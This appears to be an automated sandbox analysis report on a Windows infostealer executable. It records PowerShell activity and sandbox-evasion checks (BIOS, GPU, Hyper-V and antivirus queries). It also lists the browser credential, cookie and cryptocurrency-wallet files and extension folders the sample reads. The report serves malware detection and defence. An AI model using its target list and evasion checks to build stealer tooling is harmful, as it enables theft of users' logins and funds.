              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00756B35 push eax; ret 0_3_00756B39
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00756B35 push eax; ret 0_3_00756B39
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00746359 push 3C477A73h; iretd 0_3_0074635E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2102Jump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe TID: 7560Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 2102 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep count: 309 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2473405041.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2450762284.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.00000000006EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2473405041.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2450762284.00000000006FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: Wallets/ElectronCash
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: window-state.json
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2472007209.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: %appdata%\Ethereum
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2277349112.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
